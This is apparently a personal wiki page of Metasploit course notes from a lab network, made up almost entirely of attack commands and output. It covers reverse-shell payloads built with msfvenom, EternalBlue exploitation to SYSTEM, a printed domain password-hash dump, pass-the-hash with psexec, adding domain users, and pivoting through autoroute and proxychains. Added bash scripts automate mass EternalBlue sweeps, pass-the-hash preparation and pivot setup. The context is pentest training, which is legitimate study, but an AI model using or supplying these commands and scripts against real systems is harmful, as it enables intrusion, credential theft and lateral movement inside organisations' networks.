Chapter 3 – Introduction to Metasploit
1. Picking an Exploit
2. Setting Exploit Options
3. Picking a Payload
4. Setting Payload Options
5. Running the Exploit
6. Connecting to the Remote System
7. Performing Post Exploitation Processes
msf > show exploits
msf > help search
msf > search ms17-010
msf > search cve:2013-3660
msf > search unreal
msf > info exploit/unix/irc/unreal_ircd_3281_backdoor
msf > use <module path>
msf > set <OPTION> <value>
To start the Database at a terminal prompt, type the following:
● service postgresql start
● service metasploit start
● msfconsole
LHOST = Local Host, or our Kali System
RHOST = Remote Host, or our target System
LPORT = Port we want to use on our Kali System
RPORT = Port we want to attack on our target System
> use exploit/unix/irc/unreal_ircd_3281_backdoor
> show options
> set rhost 192.168.15.214
> exploit
##Multiple Target Types
> show targets
> use exploit/windows/smb/ms08_067_netapi
> show options
> show targets
> set target 2
> show options
> show advanced
##Picking a Payload
> show payloads
> set payload
examples:
set payload osx/x86/shell_reverse_tcp
set payload linux/x64/shell_reverse_tcp
set payload windows/shell_reverse_tcp
*set payload windows/meterpreter/reverse_tcp
reverse_tcp ## the transport: how the payload talks to the attacking system (reverse = it connects back to us, bind = it listens and we connect to it)
##Setting Payload Options
> show options
> set payload windows/meterpreter/reverse_tcp
##Running the Exploit
> show options
> set lhost 192.168.15.236 (kali)
> set rhost 192.168.15.243 (win)
> exploit
##Connecting to a Remote Session
> sessions ## To check what sessions were created
> sessions -i <nr> ## interact with session number nr
meterpreter> ##prompt When we connect to the session
meterpreter> shell ##we can see that we do indeed have a remote shell to the Windows system.
Chapter 4 – Meterpreter Shell
Word
via SMB a script can be loaded into that document
what kind of malware is it?
pivoting | tunneling
autoroute
reverse vs bind
#############################################################################
28.05.2018
Rapid7 = Metasploit, written in Ruby
development / usage
exploit
vulnerability
threat
payload (this is the part antivirus detects)
vsftpd 2.3.4 (vulnerable)
metasploit:
msfconsole (preferred)
msfvenom
msfpayload (merged into msfvenom)
msfencode (merged into msfvenom)
msfgui - deprecated
msfweb - deprecated
msfconsole (preferred):
armitage - GUI for Metasploit
modules:
exploits
auxiliary
post
payload
encoders
nops
msfvenom
-p --payload
windows #OS platform
/meterpreter #payload type
reverse_tcp #communication method (connects back to us)
LHOST= #our IP, which the malware will connect back to
LPORT= #our port, where we wait for the connection
-f --Output format, exe or elf
-o --out <path> Save the payload, e.g. foto.exe
use exploit/multi/handler
show options
set payload windows/meterpreter/reverse_tcp
set lhost <local ip>
set lport <local port>
exploit
shell
dir :)
#############################################################################
###04.2018
RC scripts
#!/bin/bash
echo -n "Prompt: "
read value
chmod +x dardan
./dardan
example
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<kali ip> LPORT=<port> -f exe -o shell.exe
==================================================
nano script.rc --create
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/meterpreter/reverse_tcp
set RHOST 172.16.60.88
exploit
sessions -i 1
msfconsole -r script.rc --to execute
==================================================
nano auto.sh -- to create the file
chmod +x auto.sh -- to make it executable
./auto.sh -- to execute
--------------------------------
#!/bin/bash
# Ask for the msfvenom parameters and build the payload file.
echo -n "Payload: "
read payload
echo -n "LHOST: "
read lhost
echo -n "LPORT: "
read lport
echo -n "Format: "
read format
echo -n "Name: "
read emri
msfvenom -p "$payload" LHOST="$lhost" LPORT="$lport" -f "$format" -o "$emri.$format"
==================================================
#!/bin/bash
# Same as above, but also write a resource script that starts the matching
# handler, then launch msfconsole with it.
echo -n "Payload: "
read payload
echo -n "LHOST: "
read lhost
echo -n "LPORT: "
read lport
echo -n "Format: "
read format
echo -n "Name: "
read emri
msfvenom -p "$payload" LHOST="$lhost" LPORT="$lport" -f "$format" -o "$emri.$format"
echo "use exploit/multi/handler" > script.rc
echo "set payload $payload" >> script.rc
echo "set lhost $lhost" >> script.rc
echo "set lport $lport" >> script.rc
echo "exploit -j" >> script.rc
msfconsole -r script.rc
./auto.sh --to execute
==================================================
.#############################################################################
*11.06.2018*
kali - 172.16.60.78
*After we have gained access.*
Vector of Attack
1. Viber
check which apps are in use (e.g. Viber)
explore whether it contains important data
2. Outlook
mail files can be taken from the hacked machine
Outlook stores the password in plaintext
3. Skype
gives the password hashed, the chat text in clear text
*How do we get access inside?*
##Target network 172.16.0.0/20
##Enumeration
SCAN: nmap 172.16.0.0/24 --default scan
nmap -Pn 172.16.0.0/20 --Pn: skip host discovery (no ping), treat every host as up
nmap -O 172.16.0.0/20 --OS detection
##Targeted service: 445 SMB (open services, service versions, e.g. ftp, 3389)
##Confirm vulnerable hosts
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 172.16.0.0/26
set threads 10
run
##VULNERABLE HOSTS
[+] 172.16.0.3:445 - Host is likely VULNERABLE to MS17-010! (Windows Server 2008 R2 Standard 7600)
[+] 172.16.0.12:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7601 Service Pack 1)
[+] 172.16.0.16:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7601 Service Pack 1)
[+] 172.16.0.17:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7601 Service Pack 1)
[+] 172.16.0.18:445 - Host is likely VULNERABLE to MS17-010! (Windows 8.1 Pro 9600)
[+] 172.16.0.19:445 - Host is likely VULNERABLE to MS17-010! (Windows 8.1 Pro 9600)
[+] 172.16.0.20:445 - Host is likely VULNERABLE to MS17-010! (Windows 8.1 Pro 9600)
##EXPLOITATION
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 172.16.0.3
exploit   -> meterpreter > getuid -> Server username: NT AUTHORITY\SYSTEM
set RHOST 172.16.0.12
exploit   -> meterpreter > getuid -> Server username: NT AUTHORITY\SYSTEM
set RHOST 172.16.0.16
exploit   -> meterpreter > getuid -> Server username: NT AUTHORITY\SYSTEM
set RHOST 172.16.0.17
exploit   -> meterpreter > getuid -> Server username: NT AUTHORITY\SYSTEM
set RHOST 172.16.0.18
exploit   -> meterpreter > getuid -> Server username: NT AUTHORITY\SYSTEM
set RHOST 172.16.0.19
exploit   -> meterpreter > getuid -> Server username: NT AUTHORITY\SYSTEM
set RHOST 172.16.0.20
exploit   -> meterpreter > getuid -> Server username: NT AUTHORITY\SYSTEM
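The sweep above repeats the same set RHOST / exploit pair by hand for each of the seven hosts. The bash script below is an added example, not part of the original notes: it reads smb_ms17_010 scanner output and writes a msfconsole resource script that tries ms17_010_eternalblue against every host marked likely vulnerable. The scanner lines are constructed from the results listed above (with one non-vulnerable host added for contrast); the LHOST 172.16.60.78 and the x64 reverse_tcp payload are assumed values for this lab, change them for your own attacking host.

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): build a msfconsole resource
# script that tries ms17_010_eternalblue against every host the
# smb_ms17_010 scanner marked as likely vulnerable.

# Constructed sample: scanner output in the format shown in the notes,
# with one non-vulnerable host added for contrast.
SCAN_OUTPUT='[+] 172.16.0.3:445     - Host is likely VULNERABLE to MS17-010! (Windows Server 2008 R2 Standard 7600)
[+] 172.16.0.12:445    - Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7601 Service Pack 1)
[-] 172.16.0.14:445    - Host does NOT appear vulnerable
[+] 172.16.0.16:445    - Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7601 Service Pack 1)
[+] 172.16.0.17:445    - Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7601 Service Pack 1)
[+] 172.16.0.18:445    - Host is likely VULNERABLE to MS17-010! (Windows 8.1 Pro 9600)
[+] 172.16.0.19:445    - Host is likely VULNERABLE to MS17-010! (Windows 8.1 Pro 9600)
[+] 172.16.0.20:445    - Host is likely VULNERABLE to MS17-010! (Windows 8.1 Pro 9600)
[*] Scanned 64 of 64 hosts (100% complete)'

# Print the IP of every host marked vulnerable, one per line, in address order.
vuln_hosts() {
    printf '%s\n' "$1" \
      | grep 'Host is likely VULNERABLE' \
      | sed -E 's/^[^0-9]*([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+):[0-9]+.*/\1/' \
      | sort -u -t. -k1,1n -k2,2n -k3,3n -k4,4n
}

# Emit the resource script on stdout. Each attempt is started as a background
# job (-j) without dropping into the session (-z), so the file runs
# unattended; "sleep" gives one attempt time to finish before RHOST changes.
# Usage: eternalblue_rc <LHOST> <target ip>...
eternalblue_rc() {
    local lhost="$1" host
    shift
    echo "use exploit/windows/smb/ms17_010_eternalblue"
    echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp"   # assumed payload
    echo "set LHOST $lhost"
    for host in "$@"; do
        echo "set RHOST $host"   # RHOST: option name in the 2018 module, alias of RHOSTS today
        echo "exploit -j -z"
        echo "sleep 30"
    done
    echo "sessions -l"
}

# Stand-alone run: redirect to eternalblue_sweep.rc and start it with
# `msfconsole -r eternalblue_sweep.rc` (the host list is word-split on purpose).
eternalblue_rc 172.16.60.78 $(vuln_hosts "$SCAN_OUTPUT")
```

The generated file ends with sessions -l, so when msfconsole finishes the list you see at once which of the hosts actually returned a shell.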
##POST EXPLOITATION
use post/windows/gather/enum_domain --finds the domain and its controller
set session 1
run (result: domain Cyberlab)
use post/windows/gather/smart_hashdump --dumps and prints the password hashes (SAM on a workstation, the domain accounts on a DC)
set session 1
run
[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:647a6dc3a05c2a2443ae9c03b5959c44
[+] krbtgt:502:aad3b435b51404eeaad3b435b51404ee:822d4c38608cd94739144ace38e0a3db
[+] Larry:1110:aad3b435b51404eeaad3b435b51404ee:847d0104f7c770d74cf4f3fcbaaacd65
[+] John:1112:aad3b435b51404eeaad3b435b51404ee:849c695d5a50144028fd6c672b00d751
[+] Lucia:1114:aad3b435b51404eeaad3b435b51404ee:78f25f28c59932b06b58b59711e8fb73
[+] Marina:1116:aad3b435b51404eeaad3b435b51404ee:edef6c82896b00f277e5a46111f806a5
[+] Alina:1117:aad3b435b51404eeaad3b435b51404ee:4484a79fef99132c010c98bde75c5399
[+] Keith:1118:aad3b435b51404eeaad3b435b51404ee:7e2b029882be49edc5633b34d4db3e7e
[+] Patrick:1122:aad3b435b51404eeaad3b435b51404ee:609dd6f9fc3d51b3d628219de6f91a8d
[+] Marc:1124:aad3b435b51404eeaad3b435b51404ee:4297197418be7a0e111290f4fc341e67
[+] Luke:1126:aad3b435b51404eeaad3b435b51404ee:faeadb333798089ee46de1f67740472d
[+] Alfa:1130:aad3b435b51404eeaad3b435b51404ee:fd6e9a2f2646007192c7450ba21fb4df
[+] Beta:1131:aad3b435b51404eeaad3b435b51404ee:8fb9d80ff33d178c16c3f43503468e83
[+] WIN-GOMU62G0LQE$:1000:aad3b435b51404eeaad3b435b51404ee:c17b74d23f5be7ad4284283393636df9
[+] LARRY-PC$:1111:aad3b435b51404eeaad3b435b51404ee:4b545d45b94464cfb56909fc8f7ddf1a
[+] JOHN-PC$:1113:aad3b435b51404eeaad3b435b51404ee:0c913011dfdb67a9ca60b739fb578478
[+] LUCIA-PC$:1115:aad3b435b51404eeaad3b435b51404ee:890f2e94b3239f87093e21724aabf141
[+] KEITH-PC$:1119:aad3b435b51404eeaad3b435b51404ee:8a4d68ea1683fcbdaa73cba4e8a077ff
[+] ALINA-PC$:1120:aad3b435b51404eeaad3b435b51404ee:4f9d70ddc18d29fa26634f1cf190c81f
[+] MARINA-PC$:1121:aad3b435b51404eeaad3b435b51404ee:d128fd0a1972738bec382bd777d1a6ca
[+] PATRICK-PC$:1123:aad3b435b51404eeaad3b435b51404ee:25d12edfe263dfa74d241b7eb8b39ea5
[+] MARC-PC$:1125:aad3b435b51404eeaad3b435b51404ee:03eb6af971a5d16b38fd91703e034077
[+] LUKE-PC$:1127:aad3b435b51404eeaad3b435b51404ee:73ab52f9d4900d661da3477b728ea366
use auxiliary/scanner/smb/smb_login
set smbuser John
set smbdomain Cyberlab
set smbpass <LM:NT hash value, e.g. aad3b435b51404eeaad3b435b51404ee:fef77dfdc7e5cdd9b28593b2d58f49e1> --pass-the-hash, no cleartext password needed
set rhosts 172.16.0.0/26
set threads 10
set verbose false
run
([+] 172.16.0.12:445 - 172.16.0.12:445 - Success: '.\John:aad3b435b51404eeaad3b435b51404ee:fef77dfdc7e5cdd9b28593b2d58f49e1' Administrator)
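Before passing a hash to smb_login or psexec (the smbpass step above), it pays to triage the dump: whether it came from a domain controller, whether LM hashes are disabled, and whether several accounts share one NT hash. The bash script below is an added example, not part of the original notes; it embeds the domain dump listed above (pwdump format, "[+]" prefixes removed) as its sample input and builds the LM:NT value that smbpass expects. The constant for the empty LM hash is the standard value; everything else is derived from the dump.

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): triage a smart_hashdump
# listing (pwdump format user:rid:LM:NT) and build the LM:NT value that
# smb_login / psexec take in smbpass for pass-the-hash.

# LM hash of the empty string: present when LM hash storage is disabled.
EMPTY_LM='aad3b435b51404eeaad3b435b51404ee'

# The domain dump from the notes above, with the "[+]" prefixes removed.
HASHDUMP='Administrator:500:aad3b435b51404eeaad3b435b51404ee:647a6dc3a05c2a2443ae9c03b5959c44
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:822d4c38608cd94739144ace38e0a3db
Larry:1110:aad3b435b51404eeaad3b435b51404ee:847d0104f7c770d74cf4f3fcbaaacd65
John:1112:aad3b435b51404eeaad3b435b51404ee:849c695d5a50144028fd6c672b00d751
Lucia:1114:aad3b435b51404eeaad3b435b51404ee:78f25f28c59932b06b58b59711e8fb73
Marina:1116:aad3b435b51404eeaad3b435b51404ee:edef6c82896b00f277e5a46111f806a5
Alina:1117:aad3b435b51404eeaad3b435b51404ee:4484a79fef99132c010c98bde75c5399
Keith:1118:aad3b435b51404eeaad3b435b51404ee:7e2b029882be49edc5633b34d4db3e7e
Patrick:1122:aad3b435b51404eeaad3b435b51404ee:609dd6f9fc3d51b3d628219de6f91a8d
Marc:1124:aad3b435b51404eeaad3b435b51404ee:4297197418be7a0e111290f4fc341e67
Luke:1126:aad3b435b51404eeaad3b435b51404ee:faeadb333798089ee46de1f67740472d
Alfa:1130:aad3b435b51404eeaad3b435b51404ee:fd6e9a2f2646007192c7450ba21fb4df
Beta:1131:aad3b435b51404eeaad3b435b51404ee:8fb9d80ff33d178c16c3f43503468e83
WIN-GOMU62G0LQE$:1000:aad3b435b51404eeaad3b435b51404ee:c17b74d23f5be7ad4284283393636df9
LARRY-PC$:1111:aad3b435b51404eeaad3b435b51404ee:4b545d45b94464cfb56909fc8f7ddf1a
JOHN-PC$:1113:aad3b435b51404eeaad3b435b51404ee:0c913011dfdb67a9ca60b739fb578478
LUCIA-PC$:1115:aad3b435b51404eeaad3b435b51404ee:890f2e94b3239f87093e21724aabf141
KEITH-PC$:1119:aad3b435b51404eeaad3b435b51404ee:8a4d68ea1683fcbdaa73cba4e8a077ff
ALINA-PC$:1120:aad3b435b51404eeaad3b435b51404ee:4f9d70ddc18d29fa26634f1cf190c81f
MARINA-PC$:1121:aad3b435b51404eeaad3b435b51404ee:d128fd0a1972738bec382bd777d1a6ca
PATRICK-PC$:1123:aad3b435b51404eeaad3b435b51404ee:25d12edfe263dfa74d241b7eb8b39ea5
MARC-PC$:1125:aad3b435b51404eeaad3b435b51404ee:03eb6af971a5d16b38fd91703e034077
LUKE-PC$:1127:aad3b435b51404eeaad3b435b51404ee:73ab52f9d4900d661da3477b728ea366'

# Lines for human accounts versus machine accounts (whose names end in $).
user_accounts()    { printf '%s\n' "$1" | grep -v '^[^:]*\$:'; }
machine_accounts() { printf '%s\n' "$1" | grep '^[^:]*\$:'; }

# True when the dump comes from a domain controller: only AD has a krbtgt account.
is_domain_dump() { printf '%s\n' "$1" | grep -q '^krbtgt:'; }

# True when every LM field is the empty-password LM hash, i.e. there are no
# weak LM hashes to crack and only the NT hashes are usable.
lm_disabled() {
    printf '%s\n' "$1" | awk -F: -v e="$EMPTY_LM" '$3 != e { bad = 1 } END { exit (bad ? 1 : 0) }'
}

# NT hashes shared by more than one human account (password reuse),
# printed as "<hash> user1 user2 ...".
shared_nt_hashes() {
    user_accounts "$1" | awk -F: '{ n[$4]++; who[$4] = who[$4] " " $1 }
        END { for (h in n) if (n[h] > 1) print h who[h] }'
}

# LM:NT value for one account, ready for "set smbpass".
pth_value() {
    printf '%s\n' "$1" | awk -F: -v u="$2" '$1 == u { print $3 ":" $4; exit }'
}

# Stand-alone report.
is_domain_dump "$HASHDUMP" && echo "domain controller dump (krbtgt present)"
lm_disabled "$HASHDUMP" && echo "LM hashes empty: crack the NT hashes or pass them"
echo "users: $(user_accounts "$HASHDUMP" | wc -l), machines: $(machine_accounts "$HASHDUMP" | wc -l)"
echo "reused NT hashes: $(shared_nt_hashes "$HASHDUMP" | wc -l)"
echo "smbpass for John: $(pth_value "$HASHDUMP" John)"
```

The machine-account hashes are worth keeping too: a computer account's NT hash authenticates to SMB exactly like a user's, which is often overlooked when only the named users are tried.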
use exploit/windows/smb/ms17_010_eternalblue
on target 172.16.0.18
verify, then exploit
set ProcessName lsass.exe --process the payload is injected into
exploit  =-WIN-=
meterpreter > getuid > Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo /PC info
use post/windows/gather/enum_applications
set session 1 --post modules take SESSION (here the 172.16.0.3 session), not RHOST
run
use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
set rhost 172.16.0.12
set smbuser <user>
set smbdomain <domain>
set smbpass <password or LM:NT hash>
exploit
meterpreter > run post/multi/gather/skype_enum
cat /home/.... --the Skype chat reveals a username and password for an email account
rdesktop 172.16.0.13 -u Larry -p ESGL -d CyberLab
use exploit/windows/smb/psexec
set smbdomain Cyberlab
set PAYLOAD windows/x64/meterpreter/bind_tcp
set rhost 172.16.0.12
exploit
getuid
shell
net user --lists the users
net user John --shows this user's details
net user John /domain --domain account details
net user user1 password /add /domain --add a domain user (access denied if we are not a domain admin)
net user user1 password /add --add a local user
net group "Domain Admins" /domain --shows which users are members
sessions
sessions -i <id>
background
-------------------------------------
run post/windows/gather
run post/windows/gather/credentials
run post/windows/gather/forensics
/vnc
/windows_autologon
/enum_domain
/enum_hostfile
/enum_chrome
/enum_ie
/enum_logged_on_users
/enum_ms_product_keys
/enum_putty_saved_sessions
/screen_spy
/usb_history
/screen_unlock
run post/multi/gather/
run post/multi/manage
skype_enum
.#############################################################################
18.06.2018
Vectors: Link, Email, Social Engineering ... Adobe Flash vulnerabilities,
load option in meterpreter????
query the DC, impersonation, add a user as a Domain Admins member, hack the DC,
Technique: socks4 (auxiliary module),
proxychains (tool, configured in /etc/proxychains.conf with a socks4 entry),
portfwd (port forwarding: a port of a host reachable from the hacked machine is forwarded to a localhost port on the hacker machine)
tool: autoroute (post module)
Stage 1 - autoroute
nmap -sn 172.16.0.0/24 (ping scan)
nano 172.16.0.0.exe (save the scan results)
nmap -sS -sV 172.16.0.16 (finds open ports, banner grabbing; save the results to a file)
nmap -p445 --script smb-vuln-ms17-010 172.16.0.16 (shows SMB vulnerability info; https://exploit-db.com to look up an exploit)
msfconsole
msf > search ms17_010
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 172.16.0.16
exploit
meterpreter > getuid
meterpreter > shell
net user /domain
net user nt-authoriity pass /add /domain
net group "Domain Admins" /domain
msf > ping 172.16.16.16 (no ping: the hacker machine has no route to 172.16.16.0/24)
shell> ping 172.16.16.16 (ping works: the compromised host has an interface on that network)
meterpreter > run post/multi/manage/autoroute
meterpreter > background
msf > route (shows the route added through the session)
msf > use auxiliary/scanner/portscan/tcp
set rports 445
set rhosts 172.16.16.16
run (now the scan goes through the session and the IP on the other interface is reachable)
set rhosts 172.16.16.0-50 (range scan for 445)
set threads 10
run
sessions -i 1
shell> arp -a (shows who the host has communicated with, i.e. its ARP cache)
meterpreter > run arp_scanner -r 172.16.16.0/24
meterpreter > background
set rhosts 172.16.16.23
set ports 22 (confirms the open ports)
run
sessions
set rports 1-1000
run
from the hacker machine: no ping to 172.16.16.23
meterpreter > portfwd add -l 21 -p 21 -r 172.16.16.23
from the hacker machine:
ftp 127.0.0.1 (local port 21 is forwarded through the session to 172.16.16.23:21; the target IP itself is still unreachable from the hacker machine)
meterpreter > portfwd flush
msf > use auxiliary/scanner/ftp/ftp_version
set rhosts 172.16.16.23
run (shows the FTP banner and version)
msf > use auxiliary/scanner/ftp/anonymous
set rhosts 172.16.16.23
run
msf > use auxiliary/scanner/ftp/ftp_login
set rhosts 172.16.16.23
set password anonymous
run
msf > sessions
meterpreter > portfwd add -l 2221 -p 21 -r 172.16.16.23
from the hacker machine:
ftp 127.0.0.1 2221
nc 127.0.0.1 2221
meterpreter > portfwd flush
meterpreter > background
msf > use auxiliary/server/socks4a
msf > run
from the hacker machine:
nano /etc/proxychains.conf: add "socks4 127.0.0.1 1080"
nmap 172.16.16.23 -p 21 (0 hosts up: not reachable directly)
proxychains nmap -sT -Pn -n 172.16.16.23 -p 21 (a SOCKS proxy only relays TCP connections, so use a connect scan and skip the ping)
proxychains ftp 172.16.16.23 (the login prompt appears)
ftp>
from the hacker machine:
proxychains firefox http://172.16.16.24
proxychains telnet 172.16.16.24 22
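The pivot above takes several hand-typed steps: autoroute through the session, socks4a on the attacking host, a proxychains entry, and a scan that only works if nmap is told to use TCP connects. The bash script below is an added example, not part of the original notes, that generates those pieces for a given session and subnet. Session 1, the subnet 172.16.16.0/24 and the SOCKS port 1080 are the lab values from the notes; SESSION/CMD/SUBNET/NETMASK and SRVHOST/SRVPORT are the option names of post/multi/manage/autoroute and auxiliary/server/socks4a.

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): generate the msfconsole
# resource script for the pivot (autoroute through the session, then a SOCKS
# server on the attacking host), the matching proxychains entry, and a scan
# command that actually works through the proxy.

# Dotted netmask from a CIDR prefix length (autoroute wants SUBNET + NETMASK).
cidr_to_netmask() {
    local bits="$1" mask
    case "$bits" in ''|*[!0-9]*) return 1 ;; esac
    [ "$bits" -le 32 ] || return 1
    mask=$(( (0xFFFFFFFF << (32 - bits)) & 0xFFFFFFFF ))
    printf '%d.%d.%d.%d\n' $(( (mask >> 24) & 255 )) $(( (mask >> 16) & 255 )) \
                           $(( (mask >> 8) & 255 ))  $(( mask & 255 ))
}

# Resource script: route <subnet> through <session>, then start socks4a on
# 127.0.0.1:<port> as a background job.
# Usage: pivot_rc <session> <subnet/prefix> <socks port>
pivot_rc() {
    local session="$1" subnet="${2%/*}" bits="${2#*/}" port="$3" mask
    mask=$(cidr_to_netmask "$bits") || { echo "bad subnet/prefix: $2" >&2; return 1; }
    cat <<EOF
use post/multi/manage/autoroute
set SESSION $session
set CMD add
set SUBNET $subnet
set NETMASK $mask
run
use auxiliary/server/socks4a
set SRVHOST 127.0.0.1
set SRVPORT $port
run -j
EOF
}

# Line for the [ProxyList] section of /etc/proxychains.conf.
proxychains_entry() { echo "socks4 127.0.0.1 $1"; }

# A SOCKS proxy relays TCP connections only: ICMP ping, raw SYN probes and
# DNS lookups never reach the far side, so use a full-connect scan (-sT),
# skip host discovery (-Pn) and skip name resolution (-n).
# Usage: proxy_scan_cmd <target> <ports>
proxy_scan_cmd() { echo "proxychains nmap -sT -Pn -n -p $2 $1"; }

# Stand-alone: print everything for the lab subnet behind session 1.
pivot_rc 1 172.16.16.0/24 1080
proxychains_entry 1080
proxy_scan_cmd 172.16.16.23 21
```

Run the generated rc with msfconsole -r after the first session is up, add the printed line to /etc/proxychains.conf, and then the printed nmap command from the attacking host reaches 172.16.16.23 through the session.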
------------------------------------------------
use auxiliary/server/browser_autopwn2
set exitonsession
show advanced (AutoRunScript is an advanced option)
set AutoRunScript post/windows/gather/enum_domain (each new session automatically runs this module)
.#############################################################################
nmap 172.16.60.52 -p- (all open ports)
nmap -sS -sV -p51 172.16.60.52 (banner grabbing)
nc 172.16.60.52 51
nano txt (save the value into the file)
base64 -d txt or base32 -d txt (decodes it)
############################################################################
dardan/cyberacademy/module-3-pentesting-with-metasploit.txt · Last modified: 2019/01/02 17:24 by dardan
